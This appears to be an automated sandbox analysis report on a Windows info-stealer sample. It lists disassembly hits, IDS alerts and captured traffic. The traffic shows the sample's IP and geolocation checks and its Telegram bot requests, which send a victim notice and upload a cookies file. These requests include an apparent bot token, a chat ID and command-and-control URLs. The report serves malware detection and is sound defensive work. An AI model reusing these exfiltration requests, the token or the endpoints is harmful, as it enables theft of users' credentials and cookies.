Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Code function: 4x nop then jmp 070E7691h	0_2_070E77F7
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Code function: 4x nop then jmp 012BF45Dh	8_2_012BF2C0
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Code function: 4x nop then jmp 012BF45Dh	8_2_012BF52F
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Code function: 4x nop then jmp 012BF45Dh	8_2_012BF4AC
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Code function: 4x nop then jmp 012BFC19h	8_2_012BF961
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Code function: 4x nop then jmp 069E3308h	8_2_069E2EF0
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Code function: 4x nop then jmp 069E2D41h	8_2_069E2A90
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Code function: 4x nop then jmp 069E3308h	8_2_069E2EE6
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Code function: 4x nop then jmp 069ED919h	8_2_069ED670
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Code function: 4x nop then jmp 069EEA79h	8_2_069EE7D0
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Code function: 4x nop then jmp 069EE1C9h	8_2_069EDF20
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Code function: 4x nop then jmp 069EF781h	8_2_069EF4D8
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Code function: 4x nop then jmp 069EEED1h	8_2_069EEC28
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Code function: 4x nop then jmp 069ED069h	8_2_069ECDC0
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Code function: 4x nop then jmp 069EDD71h	8_2_069EDAC8
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Code function: 4x nop then jmp 069ED4C1h	8_2_069ED218
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Code function: 4x nop then jmp 069E3308h	8_2_069E3236
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Code function: 4x nop then jmp 069E0D0Dh	8_2_069E0B30
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Code function: 4x nop then jmp 069E16F8h	8_2_069E0B30
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Code function: 4x nop then jmp 069EE621h	8_2_069EE378
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Code function: 4x nop then jmp 069EF329h	8_2_069EF080
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	8_2_069E0040
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Code function: 4x nop then jmp 069EFBD9h	8_2_069EF930
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Code function: 4x nop then jmp 06D66832h	9_2_06D66998
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Code function: 4x nop then jmp 0128F45Dh	13_2_0128F2C0
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Code function: 4x nop then jmp 0128F45Dh	13_2_0128F4AC
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Code function: 4x nop then jmp 0128FC19h	13_2_0128F961
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Code function: 4x nop then jmp 057CFBD9h	13_2_057CF930
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Code function: 4x nop then jmp 057CD069h	13_2_057CCDC0
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	13_2_057C0040
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Code function: 4x nop then jmp 057CEED1h	13_2_057CEC28
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Code function: 4x nop then jmp 057CF781h	13_2_057CF4D8
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Code function: 4x nop then jmp 057CF329h	13_2_057CF080
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Code function: 4x nop then jmp 057CE621h	13_2_057CE378
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Code function: 4x nop then jmp 057C0D0Dh	13_2_057C0B30
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Code function: 4x nop then jmp 057C16F8h	13_2_057C0B30
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Code function: 4x nop then jmp 057CE1C9h	13_2_057CDF20
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Code function: 4x nop then jmp 057CEA79h	13_2_057CE7D0
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Code function: 4x nop then jmp 057CD919h	13_2_057CD670
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Code function: 4x nop then jmp 057C3308h	13_2_057C3236
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Code function: 4x nop then jmp 057CD4C1h	13_2_057CD218
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Code function: 4x nop then jmp 057C3308h	13_2_057C2EF0
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Code function: 4x nop then jmp 057C3308h	13_2_057C2EE7
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Code function: 4x nop then jmp 057CDD71h	13_2_057CDAC8
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Code function: 4x nop then jmp 057C2D41h	13_2_057C2A90

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.6:49719 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.6:49724 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.6:49722 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.6:49723 -> 149.154.167.220:443

Uses the Telegram API (likely for C&C communication)

Source: unknown

DNS query: name: api.telegram.org

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:305090%0D%0ADate%20and%20Time:%2011/03/2025%20/%2017:23:57%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20305090%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:305090%0D%0ADate%20and%20Time:%2011/03/2025%20/%2016:15:42%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20305090%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot8019869757:AAFZ9XHN-49qRW4hpU6dvLTFC3DhSZuSUNk/sendDocument?chat_id=5649235024&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0ACookies%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd6146cff2451dHost: api.telegram.orgContent-Length: 744
Source: global traffic	HTTP traffic detected: POST /bot8019869757:AAFZ9XHN-49qRW4hpU6dvLTFC3DhSZuSUNk/sendDocument?chat_id=5649235024&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0ACookies%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd613809692b18Host: api.telegram.orgContent-Length: 744

Source: Joe Sandbox View	IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View	IP Address: 104.21.112.1 104.21.112.1
Source: Joe Sandbox View	IP Address: 104.21.112.1 104.21.112.1
Source: Joe Sandbox View	IP Address: 193.122.6.168 193.122.6.168

Source: Joe Sandbox View	JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown	DNS query: name: checkip.dyndns.org
Source: unknown	DNS query: name: reallyfreegeoip.org

Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:49692 -> 193.122.6.168:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:49690 -> 193.122.6.168:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:49687 -> 193.122.6.168:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:49685 -> 193.122.6.168:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:49682 -> 193.122.6.168:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49684 -> 104.21.112.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49688 -> 104.21.112.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49716 -> 104.21.112.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49693 -> 104.21.112.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49702 -> 104.21.112.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49708 -> 104.21.112.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49689 -> 104.21.112.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49710 -> 104.21.112.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49698 -> 104.21.112.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49706 -> 104.21.112.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49714 -> 104.21.112.1:443

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: unknown	HTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.6:49683 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.6:49686 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 192.168.2.6:49686 -> 104.21.112.1:443 version: TLS 1.0

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:305090%0D%0ADate%20and%20Time:%2011/03/2025%20/%2017:23:57%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20305090%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:305090%0D%0ADate%20and%20Time:%2011/03/2025%20/%2016:15:42%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20305090%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic	DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic	DNS traffic detected: DNS query: api.telegram.org

Source: unknown

HTTP traffic detected: POST /bot8019869757:AAFZ9XHN-49qRW4hpU6dvLTFC3DhSZuSUNk/sendDocument?chat_id=5649235024&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0ACookies%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd6146cff2451dHost: api.telegram.orgContent-Length: 744

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Mon, 10 Mar 2025 14:38:04 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Mon, 10 Mar 2025 14:38:07 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection

Source: SNKO05B241100201.exe, 00000008.00000002.3928992900.0000000002E0E000.00000004.00000800.00020000.00000000.sdmp, HURBBASu.exe, 0000000D.00000002.3929285502.0000000002F0C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://51.38.247.67:8081/_send_.php?L
Source: SNKO05B241100201.exe, 00000000.00000002.1512935966.00000000046BC000.00000004.00000800.00020000.00000000.sdmp, HURBBASu.exe, 0000000D.00000002.3926594506.0000000000434000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
Source: SNKO05B241100201.exe, 00000000.00000002.1512935966.00000000046BC000.00000004.00000800.00020000.00000000.sdmp, SNKO05B241100201.exe, 00000008.00000002.3928992900.0000000002C21000.00000004.00000800.00020000.00000000.sdmp, HURBBASu.exe, 0000000D.00000002.3926594506.0000000000434000.00000040.00000400.00020000.00000000.sdmp, HURBBASu.exe, 0000000D.00000002.3929285502.0000000002D21000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://aborters.duckdns.org:8081
Source: SNKO05B241100201.exe, 00000000.00000002.1512935966.00000000046BC000.00000004.00000800.00020000.00000000.sdmp, SNKO05B241100201.exe, 00000008.00000002.3928992900.0000000002C21000.00000004.00000800.00020000.00000000.sdmp, HURBBASu.exe, 0000000D.00000002.3926594506.0000000000434000.00000040.00000400.00020000.00000000.sdmp, HURBBASu.exe, 0000000D.00000002.3929285502.0000000002D21000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anotherarmy.dns.army:8081
Source: SNKO05B241100201.exe, 00000008.00000002.3928992900.0000000002E0E000.00000004.00000800.00020000.00000000.sdmp, HURBBASu.exe, 0000000D.00000002.3929285502.0000000002F1C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://api.telegram.org
Source: SNKO05B241100201.exe, 00000008.00000002.3928992900.0000000002C21000.00000004.00000800.00020000.00000000.sdmp, HURBBASu.exe, 0000000D.00000002.3929285502.0000000002D21000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org
Source: SNKO05B241100201.exe, 00000008.00000002.3928992900.0000000002C21000.00000004.00000800.00020000.00000000.sdmp, HURBBASu.exe, 0000000D.00000002.3929285502.0000000002D21000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/
Source: SNKO05B241100201.exe, 00000000.00000002.1512935966.00000000046BC000.00000004.00000800.00020000.00000000.sdmp, HURBBASu.exe, 0000000D.00000002.3926594506.0000000000434000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/q
Source: SNKO05B241100201.exe, 00000000.00000002.1511841571.0000000002E73000.00000004.00000800.00020000.00000000.sdmp, SNKO05B241100201.exe, 00000008.00000002.3928992900.0000000002C21000.00000004.00000800.00020000.00000000.sdmp, HURBBASu.exe, 00000009.00000002.1556203293.0000000002A16000.00000004.00000800.00020000.00000000.sdmp, HURBBASu.exe, 0000000D.00000002.3929285502.0000000002D21000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
